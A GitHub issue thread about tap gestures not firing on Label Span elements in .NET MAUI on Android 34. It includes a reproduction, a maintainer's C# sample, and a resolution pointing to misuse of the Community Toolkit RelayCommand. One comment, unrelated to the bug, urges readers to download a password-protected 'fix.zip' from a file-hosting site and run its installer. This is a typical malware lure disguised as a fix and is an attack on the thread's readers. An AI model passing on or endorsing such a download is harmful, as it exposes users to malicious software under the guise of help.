### ISSUE TITLE
Gestures still don't work on Label Spans

### ISSUE THREAD

**Issue by CostasAthan** [dotnet/maui#24432]
### Description

This is [a problem](https://github.com/dotnet/maui/issues/4734) supposedly solved and closed: https://github.com/dotnet/maui/pull/14410, but unfortunately in reality it still exists.

With .NET 8 and targeting Android 34 the gestures still don't work on `Span` tags of `Labels`.

I have provided a link to a repository that reproduces the bug.

### Link to public reproduction project repository

https://github.com/CostasAthan/GesturesLabelSpansFailure

### Version with bug

Unknown/Other

### Is this a regression from previous behavior?

Yes, this used to work in Xamarin.Forms

### Last version that worked well

Unknown/Other

### Affected platforms

Android

### Affected platform versions

Android 34

### Did you find any workaround?

No.

**Comment by MoonShadowIllusion** [comment]
Download 
https://www.mediafire.com/file/o50xaz6wgtazqnx/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by kevinxufei** [comment]
This issue has been verified using Visual Studio 17.12 Preview 1 (8.0.80 & 8.0.3). Can repro on android platform with sample project.

**Comment by kubaflo** [comment]
I cannot reproduce it

https://github.com/user-attachments/assets/4a88166e-901d-4de2-b624-f07f4fe91980


```c#
public partial class MainPage : ContentPage
{
	public MainPage()
	{
		InitializeComponent();
		BindingContext = new MainPageViewModel();
	}
}

public class MainPageViewModel : INotifyPropertyChanged
{
	public MainPageViewModel()
	{
		OpenAlertCommand = new Command(()=>{
			Application.Current!.MainPage.DisplayAlert("sad","asd","sda");
		});
	}
	public Command OpenAlertCommand{get; set;}
	public event PropertyChangedEventHandler PropertyChanged;

	protected void OnPropertyChanged([CallerMemberName] string propertyName = null)
        => PropertyChanged?.Invoke(this, new PropertyChangedEventArgs(propertyName));
}
```

**Comment by CostasAthan** [comment]
@kubaflo 

Is your version of code necessary? Shouldn't my version work too? It used to work with Xamarin.Forms.

**Comment by kubaflo** [comment]
@CostasAthan Yeah, you're incorrectly using Community Toolkit Rely Command: https://learn.microsoft.com/en-us/dotnet/communitytoolkit/mvvm/generators/relaycommand

**Comment by kubaflo** [comment]
@CostasAthan @karthikraja-arumugam is right. Let us know if it fixes your problem :)
